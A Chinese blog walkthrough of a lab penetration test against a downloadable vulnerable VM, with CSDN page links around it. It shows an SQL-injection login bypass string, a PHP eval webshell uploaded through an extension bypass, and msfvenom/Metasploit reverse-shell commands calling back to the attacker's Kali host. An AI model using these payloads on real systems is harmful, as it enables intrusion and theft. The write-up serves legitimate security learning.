kali对未知web server透测试2

最新推荐文章于 2024-07-26 14:20:58 发布
最新推荐文章于 2024-07-26 14:20:58 发布
阅读量4.2w 收藏 7
点赞数 2
分类专栏: kali web 渗透 文章标签: kali linux 数据库 mysql shell 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39583774/article/details/119026331
版权

环境介绍

主机IP(NAT)
kali192.168.252.128
靶机2未知

靶机下载:https://pan.baidu.com/s/1u5xbmU13wheXE4_M508qFw
提取码:1234

打开靶机

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

主机探测

NAT网卡位于192.168.252.0/24网段
在这里插入图片描述

进行主机探测

netdiscover -i eth0 -r 192.168.252.0/24

在这里插入图片描述

信息收集

在这里插入图片描述

访问web界面
在这里插入图片描述

在这里插入图片描述
没有发现可疑渗透点,这里使用目录爆破,看一下有没有隐藏界面。

 dirb http://192.168.252.129/

在这里插入图片描述
在这里插入图片描述
发现有uplaods
在这里插入图片描述

再使用AWVS扫描器进行扫描,
AWVS安装方法:https://blog.csdn.net/qq_39583774/article/details/118766805

在这里插入图片描述
结构扫描到login界面
在这里插入图片描述
在这里插入图片描述
查看源代码

在这里插入图片描述
在这里插入图片描述
意思是只能以@btrisk.com结尾
使用万能密码绕过最后使用’OR 1=1#@btrisk.com成功绕过

账号:'OR 1=1#@btrisk.com
密码随便

在这里插入图片描述
发现上传点
在这里插入图片描述

尝试上传文件
在这里插入图片描述
这里提示只能上传jpg,png格式。
修改扩展名上传
在这里插入图片描述

失败过程

在这里插入图片描述

发现上传成功,由此得到并没有对内容过滤。
写入一句话木马

<?php @eval($_POST['pass']);?>

在这里插入图片描述
记得把扩展名改为png或者jpg
在这里插入图片描述

使用burp修改扩展名为php
在这里插入图片描述

在这里插入图片描述
点击发送
在这里插入图片描述
点击运行木马
在这里插入图片描述
使用中国菜刀连接
在这里插入图片描述
成功反弹shell,查看权限
在这里插入图片描述
在这里插入图片描述
这里应该是制作靶机的人失误了,直接把数据库密码写在这里。
在这里插入图片描述
但是菜刀一直卡在这里,可以放弃这种方式,去查找提权脚本。
在这里插入图片描述

在这里插入图片描述

在kali中开启apache2服务把脚本上传到html目录下在这里插入图片描述

在靶机中的高权限目录中下载提权脚本
在这里插入图片描述
在这里插入图片描述
这里提权脚本一直卡着,不知道是什么问题,有人知道什么问题可以解决一下。
另辟蹊径

使用kali进行制作木马连接。
在kali中开启监听模块。

 msfconsole 
 use exploit/multi/handler
 set payload php/meterpreter/reverse_tcp
 set lhost 192.168.252.128
 run

在这里插入图片描述

制作木马文件

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.252.128 lport=4444 -f raw > muma.php

在这里插入图片描述
在菜刀中删除刚刚上传的木马,再次上传。
在这里插入图片描述
修改扩展名上传
在这里插入图片描述
点击运行
回到kali此时kali已经反弹shell
在这里插入图片描述
输入shell进入shell
在这里插入图片描述
使用python调用本地shell

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述
到这里发现应该是提权脚本把数据库文件删除了,此时数据库服务已经挂了gg。
在这里插入图片描述
只能重新开一个一样的虚拟机,直接使用kali登录数据库。

成功过程

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功进入系统
在这里插入图片描述

修改完密码就可以登录了。

这里使用提权脚本会删库,我尝试过使用脏牛提权发现也会失败,不知道什么原因,有知道的望告知,谢谢了!!!

0x717866
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Kali Linux Web测试秘籍
09-26
Kali Linux Web测试秘籍Kali Linux Web测试秘籍Kali Linux Web测试秘籍Kali Linux Web测试秘籍Kali Linux Web测试秘籍 Kali Linux Web测试秘籍
kali未知web server测试4
信安是不可或缺的一部分!
08-04 1万+
环境 主机 ip kaliLinux 192.168.101.62(桥接) 靶机-4 未知 打开靶机 渗测试 主机探测 netdiscover -i eth1 -r 192.168.101.0/24 可以看到靶机地址为192.168.101.75 收集信息 使用dirb目录爆破 漏洞扫描 nikto -host http://192.168.101.75 访问web界面 这里可以看到phpadmin版本 尝试弱密码登录 尝试发现 admin+空密码登录
kali未知web server测试1
热门推荐
信安是不可或缺的一部分!
07-21 4万+
1.打开靶机
Linux下重启apache
weixin_33939380的博客
06-20 358
Linux系统为Ubuntu 一、Start Apache 2 Server /启动apache服务 # /etc/init.d/apache2 startor$ sudo /etc/init.d/apache2 start 二、 Restart Apache 2 Server /重启apache服务 # /etc/init.d/apache2 restartor$ sudo /etc/i...
web测试(sqlmap)
m0_58713554的博客
12-24 3320
通过分析靶机JLS02页面信息,寻找漏洞页面,将WEB服务存在SQL注入漏洞的页面名称作为Flag提交 Flag:index2.php 通过本地PC中的渗测试平台KALI2020对靶机进行SQL注入攻击,获取靶机的数据库信息,将用来存放WEB服务的数据库名称作为FLAG提交 先随便输入点什么 sqlmap这个地址 sqlmap 使用注入语句结果如下 flag:webiu 3. 通过本地PC中的渗测试平台KALI2020对靶机进行SQL注入攻击,获取靶机的数据库信息,将用...
kali Apache简单操作
Sea_Sand息禅
06-01 5463
kali上是自带的有Apache的,学习一些简单的操作。 1、基础操作 打开:/etc/init.d/apache2 start 重启:/etc/init.d/apache2 restart 关闭:/etc/init.d/apache2 stop 2、修改默认目录 修改/etc/apache2/sites-available/000-default.conf 修改这里的目录就可以修改127.0....
Web测试使用kali linux
05-20
web环境下使用kali linux进行渗测试Web是目前最普遍和主流的入侵通道。
Web测试 使用Kali Linux
06-15
使用kali linux做web的经典书籍,外文书籍中文翻译。
kali带apache_kali中网卡、ssh、apache的配置与开启
weixin_34327800的博客
01-14 470
Kali-linux中修改网卡文件,启动ssh和apache服务的方法1、su root //取得root权限2、shift+字母 //大小写字母切换3、修改网卡配置采用DHCP方式上网在桌面右键->在终端中打开 -> 输入命令“vim /etc/network/interfaces” -> 键盘输入i 进入插入编辑模式 -> 按如图配置好...
kali 利用apache2 把网页挂到外网上
tanmengdebaba的博客
10-24 2395
去飞鸽 qydev 等等内网穿网站 申请个http的隧道 前置域名 备注随便 用户名密码可以不写本地IP端口图中有问题 写成127.0.0.1:80 不是8080 去https://www.fgnwct.com/下载 LInux(arm)64位的 放到kali 主目录下 也就是root目录 启动隧道: 把-vkey=后面的换成自己的隧道Id 把自己要运行的网页文件放在/root/var/www/html/下 下载安装apache2(如果没有安装的话 百度方法很多)...
Kali学习笔记23:Web简介
weixin_30583563的博客
11-08 358
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 我这里先说几句: 其实从缓冲区溢出到Web之间还有很多的内容 但是Web实在有学习的必要,我打算先学习这些内容 Web: 早期Web其实是攻击Web服务器,比如IIS或者是Tomcat C/S架构时期:程序员很...
CTF靶场——BTRisk
su__xiaoyan的博客
01-23 944
实验环境 攻击机:172.20.10.5 靶机:172.20.10.6 实验流程 端口扫描 命令:nmap -p- IP地址 开放了21、22以及80端口 端口详细信息探测 命令:nmap -T4 -A -v IP地址 21端口对应的ftp服务使用的是vsftpd 3.0.2搭建的 80端口对应的Web服务器为Apache 2.4.7 21端口溢出漏洞探测 命令:searchsploit vsftp 3.0.2 vsftp 3.0.2并不存在溢出漏洞 网站详细信息探测 命令:nikto -host
Apollo使用(3):分布式docker部署
游王子的博客
07-24 546
Apollo 1.7.0版本开始会默认上传Docker镜像到,可以按照如下步骤获取。
图数据库查询与操作指南-以Nebula图数据库为例
DZSpace,专注于计算机科学与技术领域的技术博主,致力于分享实用知识与技巧,帮助读者快速掌握技术要点,共同探索计算机世界的无限可能。欢迎访问DZSpace的博客,一起学习进步!
07-26 287
图数据库查询与操作指南-以Nebula图数据库为例
ODBC连接达梦数据库
qq_55187735的博客
07-24 254
用户执行,因为环境变量配置在。
SQL基础入门:解锁数据库管理的钥匙
最新发布
WayneYalejk的博客
07-26 350
在数字化时代,数据已成为企业最宝贵的资产之一。为了高效地存储、查询和管理这些数据,SQL(Structured Query Language,结构化查询语言)应运而生。SQL不仅是数据库管理员的必备技能,也是数据分析师、开发人员等多个领域从业者的重要工具。本文将带您踏入SQL的世界,从基础概念到实际应用,一步步解锁数据库管理的钥匙。强调SQL在数据处理和分析中的重要性,鼓励读者通过实践不断深化对SQL的理解和应用。
sqlalchemy使用json_unquote函数的mysql like查询
ithongchou的博客
07-23 1292
为您自己的数据库连接信息,并根据实际表结构修改模型类。函数查询MySQL JSON字段可以通过使用。下面是一个示例,假设有一个名为。请确保替换示例代码中的数据库连接字符串(在SQLAlchemy中使用。的表,其中包含一个名为。
CTF-NSSCTF题单[GKCTF2020]
2302_78903258的博客
07-24 1213
在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。访问/eval的路由,会设置一个delay,和你传入的get参数的delay进行比较,取较大的那个,然后setTimeout是延时函数,delay秒后就会执行第一个参数,即next(),否则就会send出timeout。是假的,但是有线索,提示说真正的flag的在。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0x717866

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值